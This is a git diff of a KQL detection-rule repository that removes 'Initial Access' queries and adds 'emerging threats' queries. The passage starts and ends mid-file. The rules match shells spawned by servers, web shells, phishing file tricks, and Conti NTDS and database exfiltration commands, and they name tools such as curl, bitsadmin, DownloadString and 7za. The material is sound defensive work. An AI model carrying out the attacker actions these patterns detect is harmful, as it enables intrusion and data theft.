startswith "8.0.5" or ProcessVersionInfoProductVersion startswith "8.0.6" or ProcessVersionInfoProductVersion startswith "8.0.7")) and (not((ProcessCommandLine contains " --remove" or ProcessCommandLine contains " --uninstall"))) \ No newline at end of file diff --git a/Initial Access/Remote_Access_Tool_-_ScreenConnect_Installation_Execution.kql b/Initial Access/Remote_Access_Tool_-_ScreenConnect_Installation_Execution.kql deleted file mode 100644 index e2ed740c..00000000 --- a/Initial Access/Remote_Access_Tool_-_ScreenConnect_Installation_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/02/11 -// Level: medium -// Description: Detects ScreenConnect program starts that establish a remote access to a system. -// Tags: attack.initial_access, attack.t1133 -DeviceProcessEvents -| where ProcessCommandLine contains "e=Access&" and ProcessCommandLine contains "y=Guest&" and ProcessCommandLine contains "&p=" and ProcessCommandLine contains "&c=" and ProcessCommandLine contains "&k=" \ No newline at end of file diff --git a/Initial Access/Remote_Access_Tool_-_ScreenConnect_Server_Web_Shell_Execution.kql b/Initial Access/Remote_Access_Tool_-_ScreenConnect_Server_Web_Shell_Execution.kql deleted file mode 100644 index e7f24392..00000000 --- a/Initial Access/Remote_Access_Tool_-_ScreenConnect_Server_Web_Shell_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Jason Rathbun (Blackpoint Cyber) -// Date: 2024/02/26 -// Level: high -// Description: Detects potential web shell execution from the ScreenConnect server process. -// Tags: attack.initial_access, attack.t1190 -DeviceProcessEvents -| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\csc.exe") and InitiatingProcessFolderPath endswith "\\ScreenConnect.Service.exe" \ No newline at end of file diff --git a/Initial Access/Remote_Access_Tool_-_Team_Viewer_Session_Started_On_Windows_Host.kql b/Initial Access/Remote_Access_Tool_-_Team_Viewer_Session_Started_On_Windows_Host.kql deleted file mode 100644 index 700bc666..00000000 --- a/Initial Access/Remote_Access_Tool_-_Team_Viewer_Session_Started_On_Windows_Host.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Josh Nickels, Qi Nan -// Date: 2024/03/11 -// Level: low -// Description: Detects the command line executed when TeamViewer starts a session started by a remote host. -Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder. - -// Tags: attack.initial_access, attack.t1133 -DeviceProcessEvents -| where ProcessCommandLine endswith "TeamViewer_Desktop.exe --IPCport 5939 --Module 1" and FolderPath =~ "TeamViewer_Desktop.exe" and InitiatingProcessFolderPath =~ "TeamViewer_Service.exe" \ No newline at end of file diff --git a/Initial Access/Shell_Process_Spawned_by_Java.EXE.kql b/Initial Access/Shell_Process_Spawned_by_Java.EXE.kql deleted file mode 100644 index 534b99c8..00000000 --- a/Initial Access/Shell_Process_Spawned_by_Java.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali -// Date: 2021/12/17 -// Level: medium -// Description: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation) -// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation -DeviceProcessEvents -| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath endswith "\\java.exe") and (not((ProcessCommandLine contains "build" and InitiatingProcessFolderPath contains "build"))) \ No newline at end of file diff --git a/Initial Access/Suspicious_Child_Process_Of_SQL_Server.kql b/Initial Access/Suspicious_Child_Process_Of_SQL_Server.kql deleted file mode 100644 index b669d6d5..00000000 --- a/Initial Access/Suspicious_Child_Process_Of_SQL_Server.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: FPT.EagleEye Team, wagga -// Date: 2020/12/11 -// Level: high -// Description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection. -// Tags: attack.t1505.003, attack.t1190, attack.initial_access, attack.persistence, attack.privilege_escalation -DeviceProcessEvents -| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (not((ProcessCommandLine startswith "\"C:\\Windows\\system32\\cmd.exe\" " and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath endswith "DATEV_DBENGINE\\MSSQL\\Binn\\sqlservr.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server\\"))) \ No newline at end of file diff --git a/Initial Access/Suspicious_Child_Process_Of_Veeam_Dabatase.kql b/Initial Access/Suspicious_Child_Process_Of_Veeam_Dabatase.kql deleted file mode 100644 index b9990b32..00000000 --- a/Initial Access/Suspicious_Child_Process_Of_Veeam_Dabatase.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/04 -// Level: critical -// Description: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection. -// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation -DeviceProcessEvents -| where (InitiatingProcessCommandLine contains "VEEAMSQL" and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (((ProcessCommandLine contains "-ex " or ProcessCommandLine contains "bypass" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "copy ") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wt.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\whoami.exe")) \ No newline at end of file diff --git a/Initial Access/Suspicious_Double_Extension_File_Execution.kql b/Initial Access/Suspicious_Double_Extension_File_Execution.kql deleted file mode 100644 index 61a0e484..00000000 --- a/Initial Access/Suspicious_Double_Extension_File_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems) -// Date: 2019/06/26 -// Level: critical -// Description: Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns -// Tags: attack.initial_access, attack.t1566.001 -DeviceProcessEvents -| where (ProcessCommandLine contains ".doc.exe" or ProcessCommandLine contains ".docx.exe" or ProcessCommandLine contains ".xls.exe" or ProcessCommandLine contains ".xlsx.exe" or ProcessCommandLine contains ".ppt.exe" or ProcessCommandLine contains ".pptx.exe" or ProcessCommandLine contains ".rtf.exe" or ProcessCommandLine contains ".pdf.exe" or ProcessCommandLine contains ".txt.exe" or ProcessCommandLine contains " .exe" or ProcessCommandLine contains "______.exe" or ProcessCommandLine contains ".doc.js" or ProcessCommandLine contains ".docx.js" or ProcessCommandLine contains ".xls.js" or ProcessCommandLine contains ".xlsx.js" or ProcessCommandLine contains ".ppt.js" or ProcessCommandLine contains ".pptx.js" or ProcessCommandLine contains ".rtf.js" or ProcessCommandLine contains ".pdf.js" or ProcessCommandLine contains ".txt.js") and (FolderPath endswith ".doc.exe" or FolderPath endswith ".docx.exe" or FolderPath endswith ".xls.exe" or FolderPath endswith ".xlsx.exe" or FolderPath endswith ".ppt.exe" or FolderPath endswith ".pptx.exe" or FolderPath endswith ".rtf.exe" or FolderPath endswith ".pdf.exe" or FolderPath endswith ".txt.exe" or FolderPath endswith " .exe" or FolderPath endswith "______.exe" or FolderPath endswith ".doc.js" or FolderPath endswith ".docx.js" or FolderPath endswith ".xls.js" or FolderPath endswith ".xlsx.js" or FolderPath endswith ".ppt.js" or FolderPath endswith ".pptx.js" or FolderPath endswith ".rtf.js" or FolderPath endswith ".pdf.js" or FolderPath endswith ".txt.js") \ No newline at end of file diff --git a/Initial Access/Suspicious_Execution_From_Outlook_Temporary_Folder.kql b/Initial Access/Suspicious_Execution_From_Outlook_Temporary_Folder.kql deleted file mode 100644 index 2b34c9c1..00000000 --- a/Initial Access/Suspicious_Execution_From_Outlook_Temporary_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/10/01 -// Level: high -// Description: Detects a suspicious program execution in Outlook temp folder -// Tags: attack.initial_access, attack.t1566.001 -DeviceProcessEvents -| where FolderPath contains "\\Temporary Internet Files\\Content.Outlook\\" \ No newline at end of file diff --git a/Initial Access/Suspicious_File_Drop_by_Exchange.kql b/Initial Access/Suspicious_File_Drop_by_Exchange.kql deleted file mode 100644 index 6f40640f..00000000 --- a/Initial Access/Suspicious_File_Drop_by_Exchange.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/10/04 -// Level: medium -// Description: Detects suspicious file type dropped by an Exchange component in IIS -// Tags: attack.persistence, attack.t1190, attack.initial_access, attack.t1505.003 -DeviceFileEvents -| where (InitiatingProcessCommandLine contains "MSExchange" and InitiatingProcessFolderPath endswith "\\w3wp.exe") and (FolderPath endswith ".aspx" or FolderPath endswith ".asp" or FolderPath endswith ".ashx" or FolderPath endswith ".ps1" or FolderPath endswith ".bat" or FolderPath endswith ".exe" or FolderPath endswith ".dll" or FolderPath endswith ".vbs") \ No newline at end of file diff --git a/Initial Access/Suspicious_HH.EXE_Execution.kql b/Initial Access/Suspicious_HH.EXE_Execution.kql deleted file mode 100644 index cd21df94..00000000 --- a/Initial Access/Suspicious_HH.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Maxim Pavlunin -// Date: 2020/04/01 -// Level: high -// Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe) -// Tags: attack.defense_evasion, attack.execution, attack.initial_access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001 -DeviceProcessEvents -| where (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe") and (ProcessCommandLine contains ".application" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Content.Outlook\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\") \ No newline at end of file diff --git a/Initial Access/Suspicious_HWP_Sub_Processes.kql b/Initial Access/Suspicious_HWP_Sub_Processes.kql deleted file mode 100644 index 7c00588f..00000000 --- a/Initial Access/Suspicious_HWP_Sub_Processes.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/10/24 -// Level: high -// Description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation -// Tags: attack.initial_access, attack.t1566.001, attack.execution, attack.t1203, attack.t1059.003, attack.g0032 -DeviceProcessEvents -| where FolderPath endswith "\\gbb.exe" and InitiatingProcessFolderPath endswith "\\Hwp.exe" \ No newline at end of file diff --git a/Initial Access/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql b/Initial Access/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql deleted file mode 100644 index 039ecce5..00000000 --- a/Initial Access/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/02/25 -// Level: high -// Description: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation -// Tags: attack.initial_access, attack.t1190, attack.persistence, attack.t1505.003 -DeviceFileEvents -| where InitiatingProcessFolderPath endswith "\\MSExchangeMailboxReplication.exe" and (FolderPath endswith ".aspx" or FolderPath endswith ".asp") \ No newline at end of file diff --git a/Initial Access/Suspicious_Microsoft_OneNote_Child_Process.kql b/Initial Access/Suspicious_Microsoft_OneNote_Child_Process.kql deleted file mode 100644 index cf718847..00000000 --- a/Initial Access/Suspicious_Microsoft_OneNote_Child_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea) -// Date: 2022/10/21 -// Level: high -// Description: Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file. -// Tags: attack.t1566, attack.t1566.001, attack.initial_access -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\onenote.exe" and (((ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".wsh" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".pif" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd") and FolderPath endswith "\\explorer.exe") or ((ProcessVersionInfoOriginalFileName in~ ("bitsadmin.exe", "CertOC.exe", "CertUtil.exe", "Cmd.Exe", "CMSTP.EXE", "cscript.exe", "curl.exe", "HH.exe", "IEExec.exe", "InstallUtil.exe", "javaw.exe", "Microsoft.Workflow.Compiler.exe", "msdt.exe", "MSHTA.EXE", "msiexec.exe", "Msxsl.exe", "odbcconf.exe", "pcalua.exe", "PowerShell.EXE", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.exe", "RUNDLL32.exe", "schtasks.exe", "ScriptRunner.exe", "wmic.exe", "WorkFolders.exe", "wscript.exe")) or (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certoc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\control.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\ieexec.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\javaw.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msidb.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\pcalua.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regasm.exe" or FolderPath endswith "\\regsvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\workfolders.exe" or FolderPath endswith "\\wscript.exe")) or (FolderPath contains "\\AppData\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\")) and (not(((ProcessCommandLine endswith "-Embedding" and FolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and FolderPath endswith "\\FileCoAuth.exe") or (ProcessCommandLine endswith "-Embedding" and FolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe")))) \ No newline at end of file diff --git a/Initial Access/Suspicious_Processes_Spawned_by_Java.EXE.kql b/Initial Access/Suspicious_Processes_Spawned_by_Java.EXE.kql deleted file mode 100644 index 7ac4d66c..00000000 --- a/Initial Access/Suspicious_Processes_Spawned_by_Java.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Andreas Hunkeler (@Karneades), Florian Roth -// Date: 2021/12/17 -// Level: high -// Description: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j) -// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation -DeviceProcessEvents -| where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\java.exe" \ No newline at end of file diff --git a/Initial Access/Suspicious_Processes_Spawned_by_WinRM.kql b/Initial Access/Suspicious_Processes_Spawned_by_WinRM.kql deleted file mode 100644 index 156ae6e7..00000000 --- a/Initial Access/Suspicious_Processes_Spawned_by_WinRM.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Andreas Hunkeler (@Karneades), Markus Neis -// Date: 2021/05/20 -// Level: high -// Description: Detects suspicious processes including shells spawnd from WinRM host process -// Tags: attack.t1190, attack.initial_access, attack.persistence, attack.privilege_escalation -DeviceProcessEvents -| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe") and InitiatingProcessFolderPath endswith "\\wsmprovhost.exe" \ No newline at end of file diff --git a/Initial Access/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql b/Initial Access/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql deleted file mode 100644 index a6b5d758..00000000 --- a/Initial Access/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Andreas Hunkeler (@Karneades) -// Date: 2021/12/22 -// Level: high -// Description: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation) -// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation -DeviceProcessEvents -| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") and InitiatingProcessFolderPath endswith "\\keytool.exe" \ No newline at end of file diff --git a/Initial Access/Terminal_Service_Process_Spawn.kql b/Initial Access/Terminal_Service_Process_Spawn.kql deleted file mode 100644 index 0e46fcfe..00000000 --- a/Initial Access/Terminal_Service_Process_Spawn.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/05/22 -// Level: high -// Description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708) -// Tags: attack.initial_access, attack.t1190, attack.lateral_movement, attack.t1210, car.2013-07-002 -DeviceProcessEvents -| where (InitiatingProcessCommandLine contains "\\svchost.exe" and InitiatingProcessCommandLine contains "termsvcs") and (not(((FolderPath endswith "\\rdpclip.exe" or FolderPath endswith ":\\Windows\\System32\\csrss.exe" or FolderPath endswith ":\\Windows\\System32\\wininit.exe" or FolderPath endswith ":\\Windows\\System32\\winlogon.exe") or isnull(FolderPath)))) \ No newline at end of file diff --git a/Initial Access/Unusual_Child_Process_of_dns.exe.kql b/Initial Access/Unusual_Child_Process_of_dns.exe.kql deleted file mode 100644 index 3866f302..00000000 --- a/Initial Access/Unusual_Child_Process_of_dns.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Rauch, Elastic (idea) -// Date: 2022/09/27 -// Level: high -// Description: Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) -// Tags: attack.initial_access, attack.t1133 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\conhost.exe")) \ No newline at end of file diff --git a/Initial Access/Unusual_File_Deletion_by_Dns.exe.kql b/Initial Access/Unusual_File_Deletion_by_Dns.exe.kql deleted file mode 100644 index 5cd09102..00000000 --- a/Initial Access/Unusual_File_Deletion_by_Dns.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Rauch (Nextron Systems), Elastic (idea) -// Date: 2022/09/27 -// Level: high -// Description: Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) -// Tags: attack.initial_access, attack.t1133 -DeviceFileEvents -| where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\dns.log")) \ No newline at end of file diff --git a/Initial Access/Unusual_File_Modification_by_dns.exe.kql b/Initial Access/Unusual_File_Modification_by_dns.exe.kql deleted file mode 100644 index 1c228bcf..00000000 --- a/Initial Access/Unusual_File_Modification_by_dns.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Rauch (Nextron Systems), Elastic (idea) -// Date: 2022/09/27 -// Level: high -// Description: Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) -// Tags: attack.initial_access, attack.t1133 -DeviceFileEvents -| where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\dns.log")) \ No newline at end of file diff --git a/Initial Access/Windows_Registry_Trust_Record_Modification.kql b/Initial Access/Windows_Registry_Trust_Record_Modification.kql deleted file mode 100644 index 614be3d0..00000000 --- a/Initial Access/Windows_Registry_Trust_Record_Modification.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Antonlovesdnb, Trent Liffick (@tliffick) -// Date: 2020/02/19 -// Level: medium -// Description: Alerts on trust record modification within the registry, indicating usage of macros -// Tags: attack.initial_access, attack.t1566.001 -DeviceRegistryEvents -| where RegistryKey contains "\\Security\\Trusted Documents\\TrustRecords" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Collection/apt31_judgement_panda_activity.kql b/KQL/rules-emerging-threats/Collection/apt31_judgement_panda_activity.kql new file mode 100644 index 00000000..a3ff5e5f --- /dev/null +++ b/KQL/rules-emerging-threats/Collection/apt31_judgement_panda_activity.kql @@ -0,0 +1,12 @@ +// Title: APT31 Judgement Panda Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2019-02-21 +// Level: critical +// Description: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report +// MITRE Tactic: Collection +// Tags: attack.collection, attack.lateral-movement, attack.credential-access, attack.g0128, attack.t1003.001, attack.t1560.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((ProcessCommandLine contains "\\aaaa\\procdump64.exe" or ProcessCommandLine contains "\\aaaa\\netsess.exe" or ProcessCommandLine contains "\\aaaa\\7za.exe" or ProcessCommandLine contains "\\c$\\aaaa\\") and (ProcessCommandLine contains "copy \\\\" and ProcessCommandLine contains "c$")) or (ProcessCommandLine contains "ldifde" and ProcessCommandLine contains "-f -n" and ProcessCommandLine contains "eprod.ldf") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Collection/conti_ntds_exfiltration_command.kql b/KQL/rules-emerging-threats/Collection/conti_ntds_exfiltration_command.kql new file mode 100644 index 00000000..8296109c --- /dev/null +++ b/KQL/rules-emerging-threats/Collection/conti_ntds_exfiltration_command.kql @@ -0,0 +1,10 @@ +// Title: Conti NTDS Exfiltration Command +// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) +// Date: 2021-08-09 +// Level: high +// Description: Detects a command used by conti to exfiltrate NTDS +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560, detection.emerging-threats + +DeviceProcessEvents +| where ProcessCommandLine contains "7za.exe" and ProcessCommandLine contains "\\C$\\temp\\log.zip" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Collection/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql b/KQL/rules-emerging-threats/Collection/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql new file mode 100644 index 00000000..da60e4e6 --- /dev/null +++ b/KQL/rules-emerging-threats/Collection/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql @@ -0,0 +1,10 @@ +// Title: Potential Conti Ransomware Database Dumping Activity Via SQLCmd +// Author: frack113 +// Date: 2021-08-16 +// Level: high +// Description: Detects a command used by conti to dump database +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1005, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "sys.sysprocesses" or ProcessCommandLine contains "master.dbo.sysdatabases" or ProcessCommandLine contains "BACKUP DATABASE") and ProcessCommandLine contains " -S localhost " and (FolderPath endswith "\\sqlcmd.exe" or (ProcessCommandLine contains "sqlcmd " or ProcessCommandLine contains "sqlcmd.exe")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql b/KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql new file mode 100644 index 00000000..bb9424a1 --- /dev/null +++ b/KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql @@ -0,0 +1,14 @@ +// Title: DarkGate - Autoit3.EXE File Creation By Uncommon Process +// Author: Micah Babinski +// Date: 2023-10-15 +// Level: medium +// Description: Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe. +This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs +process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other +processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.execution, attack.t1105, attack.t1059, detection.emerging-threats + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\Autoit3.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\ExtExport.exe" or InitiatingProcessFolderPath endswith "\\KeyScramblerLogon.exe" or InitiatingProcessFolderPath endswith "\\wmprph.exe") and FolderPath endswith "\\Autoit3.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Command and Control/pandemic_registry_key.kql b/KQL/rules-emerging-threats/Command and Control/pandemic_registry_key.kql new file mode 100644 index 00000000..e0507dbe --- /dev/null +++ b/KQL/rules-emerging-threats/Command and Control/pandemic_registry_key.kql @@ -0,0 +1,10 @@ +// Title: Pandemic Registry Key +// Author: Florian Roth (Nextron Systems) +// Date: 2017-06-01 +// Level: critical +// Description: Detects Pandemic Windows Implant +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105, detection.emerging-threats + +DeviceRegistryEvents +| where RegistryKey contains "\\SYSTEM\\CurrentControlSet\\services\\null\\Instance" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Command and Control/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql b/KQL/rules-emerging-threats/Command and Control/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql new file mode 100644 index 00000000..7a9ee05c --- /dev/null +++ b/KQL/rules-emerging-threats/Command and Control/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql @@ -0,0 +1,12 @@ +// Title: Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-29 +// Level: high +// Description: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, detection.emerging-threats +// False Positives: +// - Unlikely + 